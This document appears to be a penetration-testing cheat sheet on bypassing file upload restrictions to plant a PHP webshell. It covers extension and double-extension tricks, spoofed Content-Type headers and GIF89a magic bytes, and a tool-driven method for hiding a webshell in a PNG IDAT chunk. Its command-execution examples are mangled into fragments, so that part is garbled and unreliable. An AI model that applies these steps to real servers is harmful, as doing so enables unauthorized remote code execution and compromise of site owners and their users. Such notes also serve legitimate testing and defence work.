# File Upload Tricks When uploading files , check for validation on : 1. **File extension** * Server side extension allowed ? : ``` php phtml php4 ``` * Stacking / Double Extension ``` .php.png .%20.php ``` Using gif (shell.php) ``` GIF89a; ``` Advanced gif ```http Content-Disposition: form-data; name="upload"; filename="web.php" Content-Type: image/png GIF89a; ``` 2. **Content-Type header** * Is server extension like php able to bypass the upload restriction ? \- If yes , just change content-type header to like image and it will still run as php. * Does the server validate content-type header like disallow application/json? 3. **Magic bytes (file hex value)** * Does the server check **file signature** ? * If no , can change file signature using `hexedit` ### PHP Function Exploit `imagecopyresampled` `imagecreatefromstring`

solution :Hide the webshell in the IDAT chunk of PNG ```http https://github.com/huntergregal/PNG-IDAT-Payload-Generator/tree/master ``` ```bash python3 generate.py -m php -o webshell.png ``` Rename to `webshell.png.php` #### Shell exec php ```php shell_exec() , exec() , system() ``` Examples ```php ``` ```php &1'); ?> &1'); ?> &1'); ?> ``` ### Content-Types of Common Files #### Pictures : ``` image/png image/jpeg image/gif ``` #### JSON : ``` application/json ``` #### PHP : ``` application/x-php application/x-www-form-urlencoded multipart/form-data application/octet-stream ``` #### TXT : ``` text/plain ``` #### XML : ``` application/xml text/xml ``` #### HTML : ``` text/html ``` #### JAVASCRIPT : ``` text/javascript application/javascript ``` #### PDF ``` application/pdf ``` #### AUDIO ``` audio/mpeg audio/wav ``` #### VIDEO ``` video/mp4 video/quicktime ```